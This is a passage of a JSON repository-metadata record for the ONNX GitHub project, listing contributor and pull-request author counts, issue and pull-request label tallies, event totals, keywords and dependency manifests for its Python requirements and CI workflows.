E":1,"DevNomadAbhi":1,"TMullerSG":1,"cocovoc":1,"Tekno-H":1,"SkylerHuang":1,"RNVALA":1,"xsz1216":1,"Johansmm":1,"LaurentBerger":1,"thestarivore":1,"JirHr":1,"alert101":1,"enpasos":1,"blacklong28":1,"ArchieLuxton":1,"MyraBaba":1,"vincent-mayer":1,"xiaomaofeng":1,"GertDekkersMagics":1,"yuan-kai-design":1,"sjbling":1,"buddhapuneeth":1,"hchings":1,"proevgenii":1,"JNR000":1,"cheng-yue-cpu":1,"johnnyleeRH":1,"shahidzk1":1,"jokokojote":1,"FattestRabbit":1,"hcyz33":1,"eezhang123":1,"lichunxiang93":1,"yuecheng-ma":1,"dtch1997":1,"quic-ernst":1,"SrinivasuluCharupally":1,"bj-noh":1,"Mathanraj-Sharma":1,"abock":1,"jordiclive":1,"abhaytechnoscore":1,"vahvero":1,"jji2019":1,"skywall":1,"muyi6":1,"yocox":1,"knwng":1,"K-prog":1,"thelou1s":1,"diyessi":1,"recmo":1,"zwfengineer":1,"baochangying":1,"softwarePupil":1,"kckeiks":1,"iamweiweishi":1,"albertoandreottiATgmail":1,"yq-Liang":1,"mhmmdjafarg":1,"kothari1997narayan":1,"srohit0":1,"ShikharJ":1,"nishantkumar1292":1,"Jeremylee1234":1,"kraiskil":1,"samvanstroud":1,"masahi":1,"praj-0":1,"Azulita0317":1,"Uwenisme":1,"vsoorya":1,"JagdishKolhe":1,"cyinen":1,"wangxianliang":1,"yaozhixin":1,"lara-hdr":1,"Nullkooland":1,"jeremyfowers":1,"arielkantorovich":1,"askhade":1,"fs-eire":1,"davidyang180":1,"yeqinfu":1,"LeoZDong":1,"elfman2":1,"Masque555":1,"tlepley-cadence":1,"findsomewhere":1,"Tom-Teamo":1,"kylekam":1,"aernoudt":1,"benjamin-kaiser":1,"robinvanemden":1,"Parsifal133":1,"highly0":1,"L-lowliet":1,"renderist":1,"yushikmr":1,"ahmedbelgacem":1,"SathwikaNandimadalam":1,"bkaruman":1,"xiao-lin-hub":1,"andyzheng-snps":1,"brevity2021":1,"RyanMetcalfeInt8":1,"pauldog":1,"wine99":1,"Lingstreasure":1,"pmixer":1,"Hyunseok-Kim0":1,"zlbdzhh":1,"vymao":1,"dfiru":1,"lix19937":1,"FlintWangacc":1,"salvatorebuono02":1,"WeichenXu123":1,"ecenurustun":1,"SStarver":1,"lostlose":1,"ABZig":1,"xiatutu":1,"Korijn":1,"MrGeva":1,"nealcha":1,"TedThemistokleous":1,"DagonArises":1,"Like2021":1,"derek-gerstmann":1,"DngBack":1,"DragonCloudBurst":1,"rocking5566":1,"himalayjor":1,"tungld":1,"joyIntel":1,"AIYoungcino":1,"Arashimu":1,"MingZeMa":1,"lmatt-bit":1,"maze2498":1,"gpchowdari":1,"max-ku":1,"lukasheinrich":1,"JasonMaojinsong":1,"Darshcg":1,"skriand":1,"vuongminh1907":1,"jakemdaly":1,"JohnHerry":1,"mingmingtasd":1,"mshudrak":1,"bmacadam-sfu":1,"mrgloom":1,"saiden89":1,"gonulsinem":1,"hmaarrfk":1,"canozcivelek":1,"yiliu30":1,"Ramsonjehu":1,"smilealvin92":1,"carzh":1,"coltonpeltierSE":1,"kroburg":1,"1278738302":1,"Yosshi999":1,"PKarhade":1,"daviddrell":1,"wangzhao123456":1,"farah-rostom98":1,"sreenikSS":1,"wejoncy":1,"ChipmunkKeeper":1,"Andrii-Osipov":1,"harrisonvanderbyl":1,"xueyingxin":1,"agrastien":1,"haveabyte":1,"BeverlyCode":1,"ZackWan":1,"ulfhanebutte":1,"woaichixihong":1,"blurSong":1,"ninono12345":1,"liushifu12138":1,"alletsr":1,"edgchen1":1,"bilelomrani1":1}},"pull_request_authors":{"table":{"andife":390,"dependabot[bot]":386,"cyyever":268,"justinchuby":185,"liqunfu":91,"xadupre":77,"gramalingam":69,"cjvolzka":63,"yuanyao-nv":37,"jcwchen":26,"tonypottera24":25,"Copilot":21,"roborags":19,"cbourjau":17,"shubhambhokare1":16,"galagam":13,"ramkrishna2910":12,"adityagoel4512":11,"isdanni":11,"thiagocrepaldi":9,"mayeut":8,"OYCN":8,"titaiwangms":8,"neNasko1":7,"daquexian":6,"Abhishek-TyRnT":6,"matteosal":6,"Ac2zoom":5,"take-cheeze":5,"konstantin-pueckler-qc":5,"MagellaX":5,"adrianlizarraga":5,"alx256":5,"ilya-lavrenov":5,"robertknight":5,"mgorny":5,"natke":4,"co63oc":4,"ice-tong":4,"ClifHouck":4,"mshudrak":4,"guoyuhong":4,"sunflowersxu":4,"Yosshi999":4,"AlexandreEichenberger":4,"emmanuel-ferdman":4,"uu2fu3o":4,"cainbit":4,"ZelboK":4,"jantonguirao":4,"geckosecurity":3,"leimao":3,"fs-eire":3,"tehbone":3,"meilofveeningen-rl":3,"ivberg":3,"slowlyideal":3,"lfopensource":3,"Shashank1202":2,"seungwoo-ji-03":2,"surajiitd":2,"linshokaku":2,"prasanthpul":2,"Swopper050":2,"bili2002":2,"wine99":2,"bzhang3":2,"peishenyan":2,"jslap-ubi":2,"JamesAllingham":2,"jagadeeshvx":2,"BowenBao":2,"chachaleo":2,"wplf":2,"broune":2,"georgen117":2,"avisinghal6":2,"celmore25":2,"Tytskiy":2,"xenova":2,"amarin16":2,"LJXLJXLJX":2,"kolasaniv1996":2,"maekawatoshiki":2,"rosemanmeilof":2,"liwuhen":2,"kylesayrs":2,"mcollinswisc":2,"autoih":2,"kcvlex":2,"KarelZe":2,"q-ycong-p":2,"MengAiDev":2,"RatishT":2,"sgjzfzzf":2,"Cecilwang":2,"ngoldbaum":2,"Flamefire":2,"mehmetcanfarsak":2,"ktf":2,"hariharans29":2,"yadunand-kamath":2,"RoboSchmied":2,"kevinch-nv":2,"csukuangfj":2,"zboszor":2,"corwinjoy":2,"nenad1002":2,"amankshihab":2,"PRESIDENT810":2,"vraspar":1,"krsjenswbp":1,"chaserileyroberts":1,"yocox":1,"kaiserliche":1,"Esttelle":1,"wdconinc":1,"wintersteiger":1,"iskunk":1,"fdwr":1,"avinashsai":1,"AtanasDimitrovQC":1,"Aishwarya0811":1,"debasishbsws":1,"pranshupant":1,"inisis":1,"linkerzhang":1,"lzu-zhanghr":1,"praasz":1,"jbachurski":1,"jiahy0825":1,"lutzroeder":1,"kumar-ish":1,"rgesteve":1,"p-wysocki":1,"iurilgit":1,"jimspohrer":1,"CodesWithWolves":1,"petewarden":1,"ayermolo":1,"yufenglee":1,"captainIT":1,"askhade":1,"rajalakshmi139":1,"PatriceVignola":1,"TedThemistokleous":1,"stliibm":1,"divyanshugit":1,"gautam1858":1,"rajveer43":1,"leso-kn":1,"frank-ff":1,"NiklasGustafsson":1,"i4oolish":1,"vahvero":1,"wschin":1,"andembry":1,"philass":1,"goldgeisser":1,"pk-g":1,"liuyu21":1,"JCRPaquin":1,"ecederstrand":1,"xuzijian629":1,"ryota717":1,"rudrOwO":1,"duanshengliu":1,"testforSRC":1,"smk2007":1,"DZADSL72-00558":1,"maxstate":1,"ee7u":1,"hobei":1,"ashay":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2025-10-29T00:00:18.463Z","repositories_count":11242444,"issues_count":34943166,"pull_requests_count":113347232,"authors_count":11042040,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{"bug":65,"question":46,"contributions welcome":11,"enhancement":6,"topic: build":6,"good first issue":6,"CI pipelines":3,"operator":3,"topic: operator":3,"[bot] pixi CI":3,"topic: documentation":3,"rfc":3,"python":2,"topic: spec clarification":2,"module: shape inference":2,"topic: runtime":2,"discussion":2,"module: reference implementation":2,"run release CIs":2,"module: spec":2,"reference implementation":1,"code style":1,"github_actions":1,"tracking":1,"dependencies":1,"documentation":1,"protobuf":1,"module: schema":1,"topic: enhancement":1,"topic: better engineering":1,"module: CI pipelines":1,"vulnerability":1,"module: version converter":1,"announcement":1}},"past_year_pull_request_labels_count":{"table":{"run release CIs":368,"github_actions":122,"python":64,"dependencies":54,"topic: build":28,"auto update doc":26,"module: spec":20,"release notes":18,"module: reference implementation":12,"topic: spec clarification":12,"topic: better engineering":12,"topic: bug fix":11,"module: CI pipelines":10,"module: utility":10,"topic: operator":10,"topic: test":9,"topic: bc breaking":9,"do not merge":9,"topic: documentation":9,"test ONNX Model Zoo":6,"review needed: operators approvers":4,"operator":4,"better engineering":4,"module: checker":3,"build":2,"contributions welcome":2,"topic: deprecation":2,"good first issue":2,"protobuf":2,"documentation":2,"module: shape inference":2,"module: ir (c++)":2,"no-stale":2,"module: schema":1,"test":1,"module: inliner":1,"topic: enhancement":1,"topic: better error message":1,"module: version converter":1}},"past_year_issue_author_associations_count":{"table":{"NONE":116,"MEMBER":44,"CONTRIBUTOR":38}},"past_year_pull_request_author_associations_count":{"table":{"CONTRIBUTOR":603,"MEMBER":343,"NONE":63}},"past_year_issue_authors":{"table":{"justinchuby":33,"andife":28,"gramalingam":3,"robertknight":3,"Aman-Surkar":3,"github-actions[bot]":3,"Ksrkmdl0226":3,"cbourjau":2,"BwL1289":2,"pnpuranik":2,"vadimkantorov":2,"kraza8":2,"yashgadodia12":2,"yuanyao-nv":2,"cho-m":2,"dependabot[bot]":2,"harshakhmk":2,"PliniLeonardo":1,"O-3llc":1,"nishantkumar1292":1,"polarathene":1,"RunnerZhong":1,"RyanMetcalfeInt8":1,"SamNour":1,"SebastianJanampa":1,"NarenR21":1,"mshudrak":1,"mkompanek":1,"mingmingtasd":1,"michalkrawczyk":1,"matscalia":1,"Mathew5000":1,"Masquito":1,"manky006":1,"LoSealL":1,"loblik":1,"liuy061530":1,"lg8080":1,"ge28boj":1,"zz64":1,"zwfengineer":1,"yzhou0919":1,"yuslepukhin":1,"yuecheng-ma":1,"yuan-kai-design":1,"yf711":1,"xsz1216":1,"xaviliz":1,"xadupre":1,"wine99":1,"willmostly":1,"wcycqjy":1,"wangxianliang":1,"vuongminh1907":1,"vraintanakarei":1,"vladlen32230":1,"vijayaramaraju-kalidindi":1,"vera121":1,"tle4336":1,"titaiwangms":1,"TinaAMD":1,"TedThemistokleous":1,"tarekgh":1,"Swopper050":1,"SubGlitch1":1,"star-hengxing":1,"galagam":1,"FlintWangacc":1,"feliuf":1,"EzioQR":1,"eKevinHoang":1,"duanshengliu":1,"DragonCloudBurst":1,"DngBack":1,"darkopetrovic":1,"danilyef":1,"coffezhou":1,"claverru":1,"BjGoCraft":1,"BEEugene":1,"bakas-george":1,"AyoubMDL":1,"aparpara":1,"antimora":1,"Andrii-Osipov":1,"amd-vivekag":1,"al-rigazzi":1,"AlexandreEichenberger":1,"alert101":1,"aksenventwo":1,"acb146":1,"abhaytechnoscore":1,"Lewington-pitsos":1,"LeoZDong":1,"Lenan22":1,"leimao":1,"lehoangHUST":1,"lantudou":1,"kumarutkarsh1248":1,"konstantin-pueckler-qc":1,"KoalaQin":1,"kckeiks":1,"KarelZe":1,"kabyanil":1,"jorickert":1,"joda01":1,"JNR000":1,"jagadeeshvx":1,"IonBoleac":1,"inisis":1,"hy846130226":1,"hrieke":1,"himalayjor":1,"hernanmd":1,"HenokB":1,"hasicx":1,"harshil1973":1,"HAfpq":1,"gpchowdari":1}},"past_year_pull_request_authors":{"table":{"andife":303,"dependabot[bot]":186,"cyyever":179,"justinchuby":97,"yuanyao-nv":23,"Copilot":21,"xadupre":18,"cbourjau":11,"gramalingam":11,"ramkrishna2910":10,"titaiwangms":8,"shubhambhokare1":8,"neNasko1":7,"robertknight":5,"MagellaX":5,"konstantin-pueckler-qc":5,"alx256":5,"mgorny":5,"co63oc":4,"mshudrak":4,"uu2fu3o":4,"emmanuel-ferdman":4,"cainbit":4,"natke":4,"meilofveeningen-rl":3,"lfopensource":3,"ilya-lavrenov":3,"geckosecurity":3,"nenad1002":2,"amarin16":2,"sgjzfzzf":2,"liwuhen":2,"Tytskiy":2,"PRESIDENT810":2,"kevinch-nv":2,"xenova":2,"bili2002":2,"leimao":2,"celmore25":2,"LJXLJXLJX":2,"kolasaniv1996":2,"surajiitd":2,"ngoldbaum":2,"jagadeeshvx":2,"seungwoo-ji-03":2,"ktf":2,"zboszor":2,"fs-eire":2,"MengAiDev":2,"take-cheeze":2,"mehmetcanfarsak":2,"kcvlex":2,"KarelZe":2,"yadunand-kamath":2,"wine99":2,"ee7u":1,"krsjenswbp":1,"ryota717":1,"isdanni":1,"rudrOwO":1,"debasishbsws":1,"stliibm":1,"Aishwarya0811":1,"vraspar":1,"Esttelle":1,"ecederstrand":1,"testforSRC":1}},"maintainers":[{"table":{"login":"andife","count":435,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"}},{"table":{"login":"justinchuby","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"}},{"table":{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"}},{"table":{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"}},{"table":{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"}},{"table":{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}},{"table":{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"}},{"table":{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"}},{"table":{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"}},{"table":{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"}},{"table":{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"}},{"table":{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"}},{"table":{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"}},{"table":{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"}}],"active_maintainers":[{"table":{"login":"andife","count":331,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"}},{"table":{"login":"justinchuby","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"}},{"table":{"login":"take-cheeze","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}}]}},"events":{"total":{"ForkEvent":182,"CreateEvent":707,"ReleaseEvent":2,"IssuesEvent":515,"WatchEvent":1669,"DeleteEvent":742,"MemberEvent":2,"IssueCommentEvent":1787,"PushEvent":1404,"GollumEvent":41,"PullRequestEvent":1102,"PullRequestReviewCommentEvent":1388,"PullRequestReviewEvent":1732},"last_year":{"ForkEvent":182,"CreateEvent":707,"ReleaseEvent":2,"IssuesEvent":515,"WatchEvent":1669,"DeleteEvent":742,"MemberEvent":2,"IssueCommentEvent":1787,"PushEvent":1404,"GollumEvent":41,"PullRequestEvent":1102,"PullRequestReviewCommentEvent":1388,"PullRequestReviewEvent":1732}},"keywords":["ai","artificial-intelligence","deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"dependencies":[{"ecosystem":"pypi","filepath":"requirements-dev.txt","sha":null,"kind":"manifest","created_at":"2022-07-19T14:38:52.788Z","updated_at":"2022-07-19T14:38:52.788Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-dev.txt","dependencies":[{"id":258721908,"package_name":"numpy","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721909,"package_name":"protobuf","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721910,"package_name":"typing-extensions","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721911,"package_name":"pytest","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721912,"package_name":"pytest-cov","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721913,"package_name":"nbval","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721914,"package_name":"wheel","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721915,"package_name":"jupyter","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721916,"package_name":"pyzmq","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721917,"package_name":"setuptools","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721918,"package_name":"twine","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721919,"package_name":"flake8","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":258721920,"package_name":"clang-format","ecosystem":"pypi","requirements":"==13.0.0","direct":true,"kind":"development","optional":false},{"id":258721921,"package_name":"mypy","ecosystem":"pypi","requirements":"==0.782","direct":true,"kind":"development","optional":false},{"id":258721922,"package_name":"types-protobuf","ecosystem":"pypi","requirements":"==3.18.4","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"requirements-release.txt","sha":null,"kind":"manifest","created_at":"2022-07-19T14:38:52.888Z","updated_at":"2022-07-19T14:38:52.888Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements-release.txt","dependencies":[{"id":258722095,"package_name":"numpy","ecosystem":"pypi","requirements":"==1.21.5","direct":true,"kind":"runtime","optional":false},{"id":258722096,"package_name":"protobuf","ecosystem":"pypi","requirements":"==3.16.0","direct":true,"kind":"runtime","optional":false},{"id":258722097,"package_name":"pytest","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":258722098,"package_name":"nbval","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":258722099,"package_name":"ipython","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":258722100,"package_name":"wheel","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":258722101,"package_name":"setuptools","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":258722102,"package_name":"twine","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"requirements.txt","sha":null,"kind":"manifest","created_at":"2022-07-19T14:38:52.972Z","updated_at":"2022-07-19T14:38:52.972Z","repository_link":"https://github.com/onnx/onnx/blob/main/requirements.txt","dependencies":[{"id":258722138,"package_name":"numpy","ecosystem":"pypi","requirements":"\u003e=1.16.6","direct":true,"kind":"runtime","optional":false},{"id":258722139,"package_name":"protobuf","ecosystem":"pypi","requirements":"\u003e=3.12.2,\u003c=3.20.1","direct":true,"kind":"runtime","optional":false},{"id":258722140,"package_name":"typing-extensions","ecosystem":"pypi","requirements":"\u003e=3.6.2.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/codeql.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:21.401Z","updated_at":"2023-01-14T13:31:21.401Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/codeql.yml","dependencies":[{"id":6898001434,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6898001435,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":6898001436,"package_name":"github/codeql-action/init","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6898001437,"package_name":"github/codeql-action/analyze","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/pages.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:21.759Z","updated_at":"2023-01-14T13:31:21.759Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/pages.yml","dependencies":[{"id":6898004512,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6898004513,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":6898004514,"package_name":"actions/configure-pages","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6898004515,"package_name":"actions/upload-pages-artifact","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":6898004516,"package_name":"actions/deploy-pages","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release_linux_aarch64.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:21.813Z","updated_at":"2023-01-14T13:31:21.813Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/release_linux_aarch64.yml","dependencies":[{"id":6898004975,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6898004976,"package_name":"docker/setup-qemu-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":6898004977,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release_linux_x86_64.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:21.918Z","updated_at":"2023-01-14T13:31:21.918Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/release_linux_x86_64.yml","dependencies":[{"id":6898004996,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6898004999,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":6898005000,"package_name":"docker://quay.io/pypa/manylinux2014_x86_64","ecosystem":"actions","requirements":"*","direct":true,"kind":"composite","optional":false},{"id":6898005003,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release_mac.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:21.953Z","updated_at":"2023-01-14T13:31:21.953Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/release_mac.yml","dependencies":[{"id":6898005017,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6898005018,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":6898005019,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/stale.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:22.041Z","updated_at":"2023-01-14T13:31:22.041Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/stale.yml","dependencies":[{"id":6898006607,"package_name":"actions/stale","ecosystem":"actions","requirements":"v5","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/weekly_mac_ci.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:22.067Z","updated_at":"2023-01-14T13:31:22.067Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/weekly_mac_ci.yml","dependencies":[{"id":6898006627,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6898006628,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/win_no_exception_ci.yml","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:22.124Z","updated_at":"2023-01-14T13:31:22.124Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/win_no_exception_ci.yml","dependencies":[{"id":6898006698,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":6898006699,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":6898006700,"package_name":"microsoft/setup-msbuild","ecosystem":"actions","requirements":"v1.1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"pypi","filepath":"docs/docsgen/source/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-01-14T13:31:22.321Z","updated_at":"2023-01-14T13:31:22.321Z","repository_link":"https://github.com/onnx/onnx/blob/main/docs/docsgen/source/requirements.txt","dependencies":[{"id":6898009223,"package_name":"markupsafe","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009226,"package_name":"matplotlib","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009229,"package_name":"myst-parser","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009231,"package_name":"onnx","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009233,"package_name":"onnxruntime","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009235,"package_name":"pillow","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009237,"package_name":"pydata_sphinx_theme","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009239,"package_name":"pydot","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009241,"package_name":"sphinx","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009242,"package_name":"sphinx-exec-code","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009323,"package_name":"sphinx-gallery","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":6898009326,"package_name":"sphinx-tabs","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/auto_update_doc.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:15.035Z","updated_at":"2023-09-22T05:49:15.035Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/auto_update_doc.yml","dependencies":[{"id":13866775436,"package_name":"actions/checkout","ecosystem":"actions","requirements":"f43a0e5ff2bd294095638e18286ca9a3d1956744","direct":true,"kind":"composite","optional":false},{"id":13866775437,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"61a6322f88396a6271a6ee3565807d608ecaddd1","direct":true,"kind":"composite","optional":false},{"id":13866775438,"package_name":"stefanzweifel/git-auto-commit-action","ecosystem":"actions","requirements":"3ea6ae190baf489ba007f7c92608f33ce20ef04a","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/check_urls.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:15.134Z","updated_at":"2023-09-22T05:49:15.134Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/check_urls.yml","dependencies":[{"id":13866775448,"package_name":"actions/checkout","ecosystem":"actions","requirements":"f43a0e5ff2bd294095638e18286ca9a3d1956744","direct":true,"kind":"composite","optional":false},{"id":13866775449,"package_name":"urlstechie/urlchecker-action","ecosystem":"actions","requirements":"b643b43e2ac605e1475331c7b67247d242b7dce4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/clang_tidy_review.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:15.253Z","updated_at":"2023-09-22T05:49:15.253Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/clang_tidy_review.yml","dependencies":[{"id":13866775536,"package_name":"actions/checkout","ecosystem":"actions","requirements":"f43a0e5ff2bd294095638e18286ca9a3d1956744","direct":true,"kind":"composite","optional":false},{"id":13866775537,"package_name":"ZedThree/clang-tidy-review","ecosystem":"actions","requirements":"f41163387a7680d93a25c1a9d24d71437c20e16f","direct":true,"kind":"composite","optional":false},{"id":13866775544,"package_name":"ZedThree/clang-tidy-review/upload","ecosystem":"actions","requirements":"f41163387a7680d93a25c1a9d24d71437c20e16f","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/clang_tidy_review_post.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:15.476Z","updated_at":"2023-09-22T05:49:15.476Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/clang_tidy_review_post.yml","dependencies":[{"id":13866775645,"package_name":"ZedThree/clang-tidy-review/post","ecosystem":"actions","requirements":"f41163387a7680d93a25c1a9d24d71437c20e16f","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/dco_merge_group.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:15.781Z","updated_at":"2023-09-22T05:49:15.781Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/dco_merge_group.yml","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/lint.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T05:49:15.855Z","updated_at":"2023-09-22T05:49:15.855Z","repository_link":"https://github.com/onnx/onnx/blob/main/.github/workflows/lint.yml","dependencies":[{"id":13866775656,"package_name":"actions/checkout","ecosystem":"actions","requirements":"f43a0e5ff2bd294095638e18286ca9a3d1956744","direct":true,"k